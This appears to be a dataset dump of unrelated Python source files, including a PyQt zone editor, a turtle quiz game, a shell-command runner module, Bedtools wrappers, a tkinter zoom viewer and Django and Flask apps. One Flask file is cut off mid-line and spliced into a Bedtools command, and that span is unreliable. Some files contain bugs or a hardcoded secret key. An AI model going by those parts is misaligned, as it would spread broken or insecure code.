Settings\n\n\n\nclass QZoneEditError(QWSException.QWSException) :\n\tdef __init__(self, code, message, sqlQuery):\n\t\tQWSException.QWSException.__init__(self, code, message)\n\t\tself.sqlQuery = sqlQuery\n\n\n\nclass Zones_Edit_Win_Class(QEditorAbstract.QEditorAbstract) :\n\tdef __init__(self, parent, zone_id=None) :\n\t\tQEditorAbstract.QEditorAbstract.__init__(self, parent, QtCore.Qt.WindowTitleHint)\n\t\tuic.loadUi(\"ui/zoneEditor.ui\", self)\n\n\t\tself.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n\n\t\t# Link to Zone Window\n\t\tself.Zone_Window_Link = parent\n\n\t\t# Win Title\n\t\tself.setWindowTitle(Settings.Settings().winTitleName('Редактор зон'))\n\n\t\tQtCore.QObject.connect(self.bbxOkCancel, QtCore.SIGNAL('accepted()'), self._ok)\n\t\tQtCore.QObject.connect(self.bbxOkCancel, QtCore.SIGNAL('rejected()'), self._cancel)\n\n\t\t# Database Zone ID\n\t\tself.zone_id = zone_id\n\n\n\tdef _createObject(self):\n\t\ttry:\n\t\t\tzoneName = self.ledZoneName.text()\n\t\t\tzoneTariff = self.ledTariff.text()\n\n\t\t\tcreateQuery = QtSql.QSqlQuery()\n\t\t\tif not createQuery.prepare(\"INSERT INTO TAXI_ZONES (ZONE_NAME, ORDER_DISCOUNT) \"\n\t\t\t\t\t\t\t\t\t\t\t\t\"VALUES (:zone_name, :order_discount) RETURNING ID_ZONE\"):\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_PREPAREQUERYFAILED(), 'Cannot prepare sql query.', createQuery)\n\n\t\t\tcreateQuery.bindValue(\":zone_name\", zoneName)\n\t\t\tif zoneTariff == '' : createQuery.bindValue(\":order_discount\", None)\n\t\t\tif not createQuery.exec_():\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_EXECQUERYFAILED(), 'Cannot exec sql query.', createQuery)\n\t\t\tif not createQuery.first():\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_GETFIRSTRECFAILED(), 'Cannot get first query.', createQuery)\n\t\t\telse: return createQuery.value(0)\n\n\t\texcept QZoneEditError as err:\n\t\t\tprint (err.code, err.message, '\\n', err.sqlQuery.lastQuery(), err.sqlQuery.lastError().text())\n\n\n\tdef _updateObject(self, id):\n\t\ttry:\n\t\t\tzoneName = self.ledZoneName.text()\n\t\t\tzoneTariff = self.ledTariff.text()\n\n\t\t\tupdateQuery = QtSql.QSqlQuery()\n\t\t\tif not updateQuery.prepare(\"UPDATE TAXI_ZONES SET ZONE_NAME=:zone_name, ORDER_DISCOUNT=:order_discount\"\n\t\t\t\t\t\t\t\t\t\t\t\t\" WHERE ID_ZONE=:id_zone\"):\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_PREPAREQUERYFAILED(), 'Cannot prepare sql query.', updateQuery)\n\t\t\tupdateQuery.bindValue(\":zone_name\", zoneName)\n\t\t\tupdateQuery.bindValue(\":order_discount\", zoneTariff)\n\t\t\tupdateQuery.bindValue(\":id_zone\", id)\n\t\t\tif not updateQuery.exec_():\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_EXECQUERYFAILED(), 'Cannot exec sql query.', updateQuery)\n\t\t\treturn True\n\n\t\texcept QZoneEditError as err:\n\t\t\tprint (err.code, err.message, '\\n', err.sqlQuery.lastQuery(), err.sqlQuery.lastError().text())\n\n\n\tdef _validateFormData(self, id):\n\t\ttry:\n\n\t\t\tzoneName = \" \".join(self.ledZoneName.text().split()).rstrip().lstrip()\n\t\t\tself.ledZoneName.setText(zoneName)\n\n\t\t\tzoneTariff = \" \".join(self.ledTariff.text().split()).rstrip().lstrip()\n\t\t\tself.ledTariff.setText(zoneTariff)\n\n\t\t\tif zoneName == '':\n\t\t\t\tself.ledZoneName.setFocus()\n\t\t\t\tQtGui.QMessageBox.critical(self, \"Ошибка\", \"Название зоны не может быть пустым.\", QtGui.QMessageBox.Ok)\n\t\t\t\treturn False\n\n\t\t\telse:\n\t\t\t\tif id is not None:\n\t\t\t\t\tcheckQuery = QtSql.QSqlQuery()\n\t\t\t\t\tif not checkQuery.prepare(\"SELECT ZONE_NAME FROM TAXI_ZONES WHERE (ZONE_NAME=:zone AND ID_ZONE<>:idZone)\"):\n\t\t\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_PREPAREQUERYFAILED(), 'Cannot prepare sql query.', checkQuery)\n\t\t\t\t\tcheckQuery.bindValue(\":zone\", self.ledZoneName.text())\n\t\t\t\t\tcheckQuery.bindValue(\":idZone\", id)\n\t\t\t\t\tif not checkQuery.exec_(): QZoneEditError(QExceptionDefines.QTSQLERR_EXECQUERYFAILED(), 'Cannot exec sql query.', checkQuery)\n\t\t\t\t\tif checkQuery.first() :\n\t\t\t\t\t\tQtGui.QMessageBox.critical(self, \"Ошибка\", \"Такая зона уже существует.\", QtGui.QMessageBox.Ok)\n\t\t\t\t\t\treturn False\n\t\t\t\treturn True\n\n\n\t\texcept QZoneEditError as err:\n\t\t\tprint (err.code, err.message, '\\n', err.sqlQuery.lastQuery(), err.sqlQuery.lastError().text())\n\n\n\tdef _clearFormData(self):\n\t\tself.ledZoneName.clear()\n\t\tself.ledTariff.clear()\n\n\n\tdef _fillFormData(self, id):\n\t\ttry:\n\t\t\tinitQuery = QtSql.QSqlQuery()\n\t\t\tif not initQuery.prepare(\"SELECT ZONE_NAME, ORDER_DISCOUNT FROM TAXI_ZONES WHERE ID_ZONE=:idZone\"):\n\t\t\t\traise QZoneEditError(QExceptionDefines.QTSQLERR_PREPAREQUERYFAILED(), 'Cannot prepare sql query.', initQuery)\n\t\t\tinitQuery.bindValue(\":idZone\", id)\n\t\t\tif not initQuery.exec_(): raise QZoneEditError(QExceptionDefines.QTSQLERR_EXECQUERYFAILED(), 'Cannot exec sql query.', initQuery)\n\t\t\tif not initQuery.first(): raise QZoneEditError(QExceptionDefines.QTSQLERR_GETFIRSTRECFAILED(), 'Cannot get Zone Name.')\n\t\t\tif not isinstance(initQuery.value(0), QtCore.QPyNullVariant): self.ledZoneName.setText(str(initQuery.value(0)))\n\t\t\tif not isinstance(initQuery.value(1), QtCore.QPyNullVariant): self.ledTariff.setText(str(initQuery.value(1)))\n\n\t\texcept QZoneEditError as err:\n\t\t\tprint (err.code, err.message, '\\n', err.sqlQuery.lastQuery(), err.sqlQuery.lastError().text())","sub_path":"src/Zones_Edit_Window.py","file_name":"Zones_Edit_Window.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189193245","text":"import numpy as np\r\n\r\n# Sum the array with all columns\r\nx = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]])\r\nv = np.array([1, 0, 1])\r\ny = np.empty_like(x)\r\n\r\nfor i in range(4):\r\n y[i, :] = x[i, :] + v\r\n\r\nprint(y)\r\n","sub_path":"Numpy-Assignment/np_broadcast.py","file_name":"np_broadcast.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224501289","text":"import subprocess\n\nimport govnsiblecli.modules.base.utils.display\nfrom shlex import split\nfrom govnsiblecli.modules import ModuleBase\n\n\nlogger = govnsiblecli.modules.base.utils.display.get_logger('root')\n\nMOD_INFO = {\n 'module_name': 'lineinfile',\n 'module_type': 'general',\n 'module_desc': 'Module to execute shell commands'\n}\n\n\ndef mod_info():\n return MOD_INFO\n\n\nclass GovnsibleModule(ModuleBase):\n def __init__(self,params):\n super(GovnsibleModule, self).__init__()\n self.params = params\n self.result = None\n\n def execute_task(self):\n task_params = self.params\n shell_command = task_params.get('command')\n command = split(shell_command)\n result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n self.result = result.stdout\n","sub_path":"govnsiblecli/modules/general/lineinfile.py","file_name":"lineinfile.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"23862678","text":"import turtle\nimport pandas\n\ndata = pandas.read_csv(\"countries.csv\")\nall_countries = data.state.to_list()\n\nscreen = turtle.Screen()\nscreen.setup()\nscreen.title(\"U.S.A States Game\")\nimage = \"./europe_map.gif\"\nscreen.addshape(image)\nturtle.shape(image)\n\n# def get_click(x,y):\n# print(x,y)\n#\n# turtle.onscreenclick(get_click)\n# turtle.mainloop()\n\ncountries_guessed = []\nwhile len(country_guessed)<37:\n answer_country = screen.textinput(title=f\"({len(country_guessed)}/37 countries guessed).\", prompt=\"Guess Another Country \").title()\n\n if answer_country == \"Exit\":\n missing_countries = [country for country in all_countries if country not in countries_guessed]\n new_data = pandas.DataFrame(missing_countries)\n new_data.to_csv(\"countries_to_learn.csv\")\n break\n if answer_country in all_countries:\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n state_info = data[data.state == answer_country]\n t.goto(int(state_info.x), int(state_info.y))\n t.write(f\"{answer_country}\",align=\"center\",font=(\"Arial\",7,\"bold\"))\n country_guessed.append(answer_country)\n\n","sub_path":"Day-27__Guess-The-European-Country-Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326257515","text":"from flask import Flask, render_template, url_for, request, redirect\nimport firebase_admin\nfrom firebase_admin import db\nimport os\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'abc123@567$#'\n\n# Initialize Firebase app\nfirebase_admin.initialize_app(options={'databaseURL': 'https://vitask.firebaseio.com/'})\nref = db.reference('vitask')\n\ndef fetch_data():\n data = ref.child(\"owasp\").child(\"leaderboard\").get()\n return data\n\n@app.route('/', methods=['GET','POST'])\ndef index():\n users = fetch_data()\n ranking = []\n for i in users:\n ranking.append(users[i])\n \n for i in range(0,len(ranking)):\n for j in range(0,len(ranking)-i-1):\n if(ranking[j][\"Rating\"] {3} !LOG2!\".format(bedtools, bed, bam,\n read_counts, ref_idx, min_overlap_a)\n\n return cmd\n\n\n # get the output file name to store coverage stats\n coverage_report = self.get_output(\"coverage_report\")\n\n # Generating coverage command\n cmd = \"{0} coverage -a {1} -b {2} -sorted -g {4} -f {5} > {3} !LOG2!\".format(bedtools,bed,bam,coverage_report,\n ref_idx, min_overlap_a)\n\n return cmd\n \nclass Intersect(Module):\n def __init__(self, module_id, is_docker = False):\n super(Intersect, self).__init__(module_id, is_docker)\n self.output_keys = [\"region_read_counts\"]\n\n def define_input(self):\n self.add_argument(\"bam\", is_required=True)\n self.add_argument(\"bam_idx\", is_required=True)\n self.add_argument(\"region_bed\", is_required=True, is_resource=True)\n self.add_argument(\"bedtools\", is_required=True, is_resource=True)\n self.add_argument(\"count_reads\", is_required=True, default_value=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=2)\n self.add_argument(\"mem\", is_required=True, default_value=8)\n\n def define_output(self):\n\n if self.get_argument(\"count_reads\"):\n # Declare reads count output filename\n region_read_counts = self.generate_file_name(\".read.counts.txt\")\n self.add_output(\"region_read_counts\", region_read_counts)\n\n def define_command(self):\n # Define command for running bedtools coverage from a platform\n bam = self.get_argument(\"bam\")\n region_bed = self.get_argument(\"region_bed\")\n bedtools = self.get_argument(\"bedtools\")\n count_reads = self.get_argument(\"count_reads\")\n\n if count_reads:\n # get the output file name to store coverage stats\n region_read_counts = self.get_output(\"region_read_counts\")\n\n # Generating coverage command for read counts\n cmd = f\"{bedtools} intersect -a {region_bed} -b {bam} -c > {region_read_counts} !LOG2!\"\n\n return cmd\n","sub_path":"Modules/Tools/Bedtools.py","file_name":"Bedtools.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580337717","text":"# -*- coding: utf-8 -*-\n# Advanced zoom example. Like in Google Maps.\n# It zooms only a tile, but not the whole image. So the zoomed tile occupies\n# constant memory and not crams it with a huge resized image for the large zooms.\nimport random\nimport tkinter as tk\nimport platform\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\n\nOS = platform.system()\n\nclass AutoScrollbar(ttk.Scrollbar):\n ''' A scrollbar that hides itself if it's not needed.\n Works only if you use the grid geometry manager '''\n def set(self, lo, hi):\n if float(lo) <= 0.0 and float(hi) >= 1.0:\n self.grid_remove()\n else:\n self.grid()\n ttk.Scrollbar.set(self, lo, hi)\n\n def pack(self, **kw):\n raise tk.TclError('Cannot use pack with this widget')\n\n def place(self, **kw):\n raise tk.TclError('Cannot use place with this widget')\n\nclass Zoom_Advanced(ttk.Frame):\n ''' Advanced zoom of the image '''\n def __init__(self, mainframe, path):\n ''' Initialize the main Frame '''\n ttk.Frame.__init__(self, master=mainframe)\n self.master.title('Zoom with mouse wheel')\n self.master.geometry('800x600')\n # Vertical and horizontal scrollbars for canvas\n vbar = AutoScrollbar(self.master, orient='vertical')\n hbar = AutoScrollbar(self.master, orient='horizontal')\n vbar.grid(row=0, column=1, sticky='ns')\n hbar.grid(row=1, column=0, sticky='we')\n # Create canvas and put image on it\n self.canvas = tk.Canvas(self.master, highlightthickness=0,\n xscrollcommand=hbar.set, yscrollcommand=vbar.set)\n self.canvas.grid(row=0, column=0, sticky='nswe')\n self.canvas.update() # wait till canvas is created\n vbar.configure(command=self.scroll_y) # bind scrollbars to the canvas\n hbar.configure(command=self.scroll_x)\n # Make the canvas expandable\n self.master.rowconfigure(0, weight=1)\n self.master.columnconfigure(0, weight=1)\n # Bind events to the Canvas\n self.canvas.bind('', self.show_image) # canvas is resized\n self.canvas.bind('', self.move_from)\n self.canvas.bind('', self.move_to)\n self.canvas.bind('', self.wheel) # with Windows and MacOS, but not Linux\n self.canvas.bind('', self.wheel) # only with Linux, wheel scroll down\n self.canvas.bind('', self.wheel) # only with Linux, wheel scroll up\n self.image = Image.open(path) # open image\n self.width, self.height = self.image.size\n self.imscale = 1.0 # scale for the canvaas image\n self.delta = 1.3 # zoom magnitude\n # Put image into container rectangle and use it to set proper coordinates to the image\n self.container = self.canvas.create_rectangle(0, 0, self.width, self.height, width=0)\n # Plot some optional random rectangles for the test purposes\n minsize, maxsize, number = 5, 20, 10\n for n in range(number):\n x0 = random.randint(0, self.width - maxsize)\n y0 = random.randint(0, self.height - maxsize)\n x1 = x0 + random.randint(minsize, maxsize)\n y1 = y0 + random.randint(minsize, maxsize)\n color = ('red', 'orange', 'yellow', 'green', 'blue')[random.randint(0, 4)]\n self.canvas.create_rectangle(x0, y0, x1, y1, fill=color, activefill='black')\n self.show_image()\n\n def scroll_y(self, *args):\n ''' Scroll canvas vertically and redraw the image '''\n self.canvas.yview(*args) # scroll vertically\n self.show_image() # redraw the image\n\n def scroll_x(self, *args):\n ''' Scroll canvas horizontally and redraw the image '''\n self.canvas.xview(*args) # scroll horizontally\n self.show_image() # redraw the image\n\n def move_from(self, event):\n ''' Remember previous coordinates for scrolling with the mouse '''\n self.canvas.scan_mark(event.x, event.y)\n\n def move_to(self, event):\n ''' Drag (move) canvas to the new position '''\n self.canvas.scan_dragto(event.x, event.y, gain=1)\n self.show_image() # redraw the image\n\n def wheel(self, event):\n ''' Zoom with mouse wheel '''\n x = self.canvas.canvasx(event.x)\n y = self.canvas.canvasy(event.y)\n bbox = self.canvas.coords(self.container) # get image area\n if bbox[0] < x < bbox[2] and bbox[1] < y < bbox[3]: pass # Ok! Inside the image\n else: return # zoom only inside image area\n scale = 1.0\n if OS == 'Darwin':\n if event.delta<0: # scroll down\n i = min(self.width, self.height)\n if int(i * self.imscale) < 30: return # image is less than 30 pixels\n self.imscale /= self.delta\n scale /= self.delta\n if event.delta>0: # scroll up\n i = min(self.canvas.winfo_width(), self.canvas.winfo_height())\n if i < self.imscale: return # 1 pixel is bigger than the visible area\n self.imscale *= self.delta\n scale *= self.delta\n else:\n # Respond to Linux (event.num) or Windows (event.delta) wheel event\n if event.num == 5 or event.delta == -120: # scroll down\n i = min(self.width, self.height)\n if int(i * self.imscale) < 30: return # image is less than 30 pixels\n self.imscale /= self.delta\n scale /= self.delta\n if event.num == 4 or event.delta == 120: # scroll up\n i = min(self.canvas.winfo_width(), self.canvas.winfo_height())\n if i < self.imscale: return # 1 pixel is bigger than the visible area\n self.imscale *= self.delta\n scale *= self.delta\n self.canvas.scale('all', x, y, scale, scale) # rescale all canvas objects\n self.show_image()\n\n def show_image(self, event=None):\n ''' Show image on the canvas '''\n box_image = self.canvas.coords(self.container) # get image area\n box_canvas = (self.canvas.canvasx(0), # get visible area of the canvas\n self.canvas.canvasy(0),\n self.canvas.canvasx(self.canvas.winfo_width()),\n self.canvas.canvasy(self.canvas.winfo_height()))\n box_img_int = tuple(map(int, box_image)) # convert to integer or it will not work properly\n # Get scroll region box\n box_scroll = [min(box_img_int[0], box_canvas[0]), min(box_img_int[1], box_canvas[1]),\n max(box_img_int[2], box_canvas[2]), max(box_img_int[3], box_canvas[3])]\n # Horizontal part of the image is in the visible area\n if box_scroll[0] == box_canvas[0] and box_scroll[2] == box_canvas[2]:\n box_scroll[0] = box_img_int[0]\n box_scroll[2] = box_img_int[2]\n # Vertical part of the image is in the visible area\n if box_scroll[1] == box_canvas[1] and box_scroll[3] == box_canvas[3]:\n box_scroll[1] = box_img_int[1]\n box_scroll[3] = box_img_int[3]\n # Convert scroll region to tuple and to integer\n self.canvas.configure(scrollregion=tuple(map(int, box_scroll))) # set scroll region\n x1 = max(box_canvas[0] - box_image[0], 0) # get coordinates (x1,y1,x2,y2) of the image tile\n y1 = max(box_canvas[1] - box_image[1], 0)\n x2 = min(box_canvas[2], box_image[2]) - box_image[0]\n y2 = min(box_canvas[3], box_image[3]) - box_image[1]\n if int(x2 - x1) > 0 and int(y2 - y1) > 0: # show image if it in the visible area\n image = self.image.crop((int(x1 / self.imscale), int(y1 / self.imscale),\n int(x2 / self.imscale), int(y2 / self.imscale)))\n imagetk = ImageTk.PhotoImage(image.resize((int(x2 - x1), int(y2 - y1))))\n imageid = self.canvas.create_image(max(box_canvas[0], box_img_int[0]),\n max(box_canvas[1], box_img_int[1]),\n anchor='nw', image=imagetk)\n self.canvas.lower(imageid) # set image into background\n self.canvas.imagetk = imagetk # keep an extra reference to prevent garbage-collection\n\npath = '../data/doge.jpg' # place path to your image here\nroot = tk.Tk()\napp = Zoom_Advanced(root, path=path)\nroot.mainloop()\n","sub_path":"zoom_advanced2.py","file_name":"zoom_advanced2.py","file_ext":"py","file_size_in_byte":8510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616050517","text":"BLOCKING_POWER = 2\n\n# NOWA KONFIGURACJA\n\n# Ustawienia heurysyk\n\n#LineEmptyOwn\nLINE_WEIGHT = 0.5\nEMPTY_WEIGHT = 0.1\nOWN_WEIGHT = 1.5\nBLOCKING_WEIGHT = 2\nDANGEROUS_SITUATION = 3\nDANGEROUS_MULTI = 5\nOWN_LINE_WEIGHT = 2.5\n\n\n# Rozmiar tablicy\nBOARD_SIZE = 15\n# Głębokość drzewa\nDEFAULT_DEPTH = 1\n# Rozmiar obszaru przeszukiwania możliwych rozwiązań\nBATCH_SIZE = 1\n# Romiar obszaru wyszukiwania wolnych pól\nEMPTY_FIELD_SIZE = 2\n# Rozmiar obszaru przy wyszukiwaniu własnych pól\nOWN_FIELD_SIZE = 3\n# Typy do sprawdzania\nTYPES = [1,2,3,4,5]","sub_path":"Gomoku/Scripts/Configuration.py","file_name":"Configuration.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"344947182","text":"#-*- coding:utf-8 -*-\n'''\nCreated on Aug 23, 2012\n\n@author: johnny\n'''\n\nimport databases\nimport error\n\nNFS_DEFAULT = {\n 'serviceip': '',\n 'resource': ''\n }\nCIFS_DEFAULT = {\n 'serviceip': '',\n 'resource': '',\n 'username': '',\n 'password': ''\n }\n\n\ndef get_storage_path(host, storage):\n qurey = databases.DBQuery(host)\n keyword = \"description=\\'\" + storage + \"\\'\"\n if not qurey.get_storagepath(keyword):\n raise error.CommonError(\"Storage not found\")\n \n return qurey.get_storagepath(keyword)\n \ndef get_storage_uuid(host, storage):\n qurey = databases.DBQuery(host)\n keyword = \"description=\\'\" + storage + \"\\'\"\n if not qurey.get_storagepath(keyword):\n raise error.CommonError(\"Storage not found\")\n \n return qurey.get_storageUuid(keyword)\n","sub_path":"versiontest/libvmd/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"395757634","text":"# Воспроизведите код с лекции 1.5 и дополните его следующим образом:\n\n# Список рецептов должен храниться в отдельном файле в следующем формате:\n# Название блюда\n# Kоличество ингредиентов\n# Название ингредиента | Количество | Единица измерения\n# Пример:\n# Омлет\n# 3\n# Яйца | 2 | шт\n# Молоко | 50 | г\n# Помидор | 100 | мл\n# В одном файле может быть произвольное количество блюд.\n# Читать список рецептов из этого файла.\n# Соблюдайте кодстайл, разбивайте новую логику на функции и не используйте глобальных переменных.\n# Код выглядел следующим образом:\n\n# cook_book = {\n# 'яйчница': [\n# {'ingredient_name': 'яйца', 'quantity': 2, 'measure': 'шт.'},\n# {'ingredient_name': 'помидоры', 'quantity': 100, 'measure': 'гр.'}\n# ],\n# 'стейк': [\n# {'ingredient_name': 'говядина', 'quantity': 300, 'measure': 'гр.'},\n# {'ingredient_name': 'специи', 'quantity': 5, 'measure': 'гр.'},\n# {'ingredient_name': 'масло', 'quantity': 10, 'measure': 'мл.'}\n# ],\n# 'салат': [\n# {'ingredient_name': 'помидоры', 'quantity': 100, 'measure': 'гр.'},\n# {'ingredient_name': 'огурцы', 'quantity': 100, 'measure': 'гр.'},\n# {'ingredient_name': 'масло', 'quantity': 100, 'measure': 'мл.'},\n# {'ingredient_name': 'лук', 'quantity': 1, 'measure': 'шт.'}\n# ]\n# }\n\n\n# def get_shop_list_by_dishes(dishes, person_count):\n# shop_list = {}\n# for dish in dishes:\n# for ingredient in cook_book[dish]:\n# new_shop_list_item = dict(ingredient)\n\n# new_shop_list_item['quantity'] *= person_count\n# if new_shop_list_item['ingredient_name'] not in shop_list:\n# shop_list[new_shop_list_item['ingredient_name']] = new_shop_list_item\n# else:\n# shop_list[new_shop_list_item['ingredient_name']]['quantity'] +=\n# new_shop_list_item['quantity']\n# return shop_list\n\n# def print_shop_list(shop_list):\n# for shop_list_item in shop_list.values():\n# print('{} {} {}'.format(shop_list_item['ingredient_name'], shop_list_item['quantity'], \n# shop_list_item['measure']))\n\n# def create_shop_list():\n# person_count = int(input('Введите количество человек: '))\n# dishes = input('Введите блюда в расчете на одного человека (через запятую): ') \\\n# .lower().split(', ')\n# shop_list = get_shop_list_by_dishes(dishes, person_count)\n# print_shop_list(shop_list)\n\n# create_shop_list()\n\ndef get_shop_list_by_dishes(dishes, person_count, cook_book):\n shop_list = {}\n for dish in dishes:\n for ingredient in cook_book[dish]:\n new_shop_list_item = dict(ingredient)\n new_shop_list_item['quantity'] *= person_count\n if new_shop_list_item['ingredient_name'] not in shop_list:\n shop_list[new_shop_list_item['ingredient_name']] = new_shop_list_item\n else:\n shop_list[new_shop_list_item['ingredient_name']]['quantity'] += new_shop_list_item['quantity']\n return shop_list\n\ndef print_shop_list(shop_list):\n for shop_list_item in shop_list.values():\n print('{} {} {}'.format(shop_list_item['ingredient_name'], shop_list_item['quantity'], shop_list_item['measure']))\n\ndef create_shop_list(cook_book):\n person_count = int(input('Введите количество человек: '))\n dishes = input('Введите блюда в расчете на одного человека (через запятую): ').lower().split(', ')\n shop_list = get_shop_list_by_dishes(dishes, person_count, cook_book)\n print_shop_list(shop_list)\n\ndef get_cooking_book(cook_book):\n with open('cooking_book.txt', encoding=\"utf-8\") as file_to_read:\n while True:\n recipe_name = file_to_read.readline().strip()\n if not recipe_name:\n break\n number_of_ingredients = int(file_to_read.readline().strip())\n list_of_ingredients = []\n for i in range(number_of_ingredients):\n ingredient = file_to_read.readline().strip().split(' | ')\n ingredients = {'ingredient_name': ingredient[0], 'quantity': int(ingredient[1]), 'measure': ingredient[2]}\n list_of_ingredients.append(ingredients)\n cook_book.update({recipe_name: list_of_ingredients})\n return cook_book\n\ndef main():\n cook_book = {}\n get_cooking_book(cook_book)\n create_shop_list(cook_book)\n\nmain()\n","sub_path":"home_work_2_1/home_work_2_1.py","file_name":"home_work_2_1.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"506262004","text":"# -*- coding:utf-8 -*-\n\nfrom django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nimport random\n\nfrom memory.models import MemoryItem\n\n\ndef display(request):\n \n priority_scale = MemoryItem.PRIORITY_CHOICE\n # Mixed list\n mem_list = list(MemoryItem.objects.all().order_by('?'))\n item = mem_list[0]\n\n return render(request, 'memory/display.html',{\n 'item':item,\n 'priority_scale':priority_scale,\n })\n\ndef change_priority(request, mem_id, new_priority): \n\n item_with_new_priority = get_object_or_404(MemoryItem, pk=mem_id)\n item_with_new_priority.priority = new_priority.encode(\"utf-8\")\n item_with_new_priority.save()\n return HttpResponseRedirect(reverse('memory:display'))\n\ndef suppr(request, mem_id):\n \n item_to_erase = get_object_or_404(MemoryItem, pk=mem_id)\n item_to_erase.delete()\n return HttpResponseRedirect(reverse('memory:display'))\n\ndef add(request):\n\n item = MemoryItem()\n if request.method=='POST':\n item.question = request.POST['question'].encode(\"utf-8\")\n item.answer = request.POST['answer'].encode(\"utf-8\")\n priority = request.POST['priority'].encode(\"utf-8\")\n\n item.save()\n return HttpResponseRedirect(reverse('memory:display'))\n return HttpResponse('erreur')","sub_path":"dev1/p2/memory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"181522596","text":"\"\"\"The module for the Nampi data entry form parser.\r\n\r\nClasses:\r\n Nampi_data_entry_form\r\n\"\"\"\r\nimport json\r\nimport logging\r\nfrom datetime import date, datetime\r\nfrom typing import List, Optional\r\n\r\nimport gspread\r\nimport pandas\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nfrom pandas import Series\r\nfrom rdflib.term import URIRef\r\n\r\nfrom modules.appellation import Appellation, Appellation_type\r\nfrom modules.appellation_assignment import Appellation_assignment\r\nfrom modules.aspect import Aspect\r\nfrom modules.author import Author\r\nfrom modules.birth import Birth\r\nfrom modules.burial import Burial\r\nfrom modules.date import Date\r\nfrom modules.death import Death\r\nfrom modules.di_act import Di_act\r\nfrom modules.event import Event\r\nfrom modules.family import Family\r\nfrom modules.gettypesandstati import GetTypesAndStati\r\n# from modules.gender import Gender\r\nfrom modules.group import Group\r\nfrom modules.nampi_graph import Nampi_graph\r\nfrom modules.nampi_type import Nampi_type\r\nfrom modules.person import Person\r\nfrom modules.place import Place\r\nfrom modules.source import Source\r\nfrom modules.source_location import Source_location\r\nfrom modules.source_type import Source_type\r\nfrom modules.title import Title\r\nfrom parsers.nampi_by_josephis.classes.entity_importer_josephis import \\\r\n Entity_Importer_Josephis\r\nfrom parsers.nampi_by_prodomo.classes.date import Dates\r\nfrom parsers.nampi_data_entry_form.nampi_data_entry_form import (\r\n Table, added_investiture_label, family_member_label)\r\n\r\n_types = dict(\r\n Geburt=\"Geburt\",\r\n Abt=\"Abt\",\r\n Beerdigung=\"Beerdigung\",\r\n Beziehung=\"Beziehung\",\r\n Bischof=\"Bischof\",\r\n Geschwister=\"Geschwister\",\r\n Konvent=\"Konvent\",\r\n Pfarrvikar=\"Pfarrvikar\",\r\n Priester=\"Priester\",\r\n Subdiakon=\"Subdiakon\",\r\n Taufe=\"Taufe\",\r\n Tod=\"Tod\",\r\n)\r\n\r\n_group_types = {\r\n \"Christian denomination\": Nampi_type.Mona.christian_denomination,\r\n \"Diocese\": Nampi_type.Mona.diocese,\r\n \"Family\": Nampi_type.Mona.family,\r\n \"Monastic community\": Nampi_type.Mona.monastic_community,\r\n \"Parish\": Nampi_type.Mona.parish,\r\n \"Polity\": Nampi_type.Mona.polity,\r\n \"Religious denomination\": Nampi_type.Mona.religious_denomination,\r\n \"Religious order\": Nampi_type.Mona.religious_order,\r\n \"Religious polity\": Nampi_type.Mona.religious_polity,\r\n \"Historic diocese\": Nampi_type.Mona.historic_diocese,\r\n}\r\n\r\n_status_types = {\r\n \"Academic degree\": Nampi_type.Mona.academic_degree,\r\n \"Clergy\": Nampi_type.Mona.clergy,\r\n \"Community subsacristan\": Nampi_type.Mona.community_subsacristan,\r\n \"Community superior\": Nampi_type.Mona.community_superior,\r\n \"Member of a religious community\": Nampi_type.Mona.member_of_a_religious_community,\r\n \"Member of a religious community with manual focus\": Nampi_type.Mona.member_of_a_religious_community_with_manual_focus,\r\n \"Member of a religious community with spiritual focus\": Nampi_type.Mona.member_of_a_religious_community_with_spiritual_focus,\r\n \"Procurator\": Nampi_type.Mona.procurator,\r\n \"Professed member of a religious community\": Nampi_type.Mona.professed_member_of_a_religious_community,\r\n \"Vice community superior\": Nampi_type.Mona.vice_community_superior,\r\n \"Visitator\": Nampi_type.Mona.visitator,\r\n \"Monastic office with spiritual focus\": Nampi_type.Mona.monastic_office_with_spiritual_focus,\r\n \"Monastic office with manual focus\": Nampi_type.Mona.monastic_office_with_manual_focus,\r\n \"Monastic office\": Nampi_type.Mona.monastic_office,\r\n \"Member of a religious community visiting\": 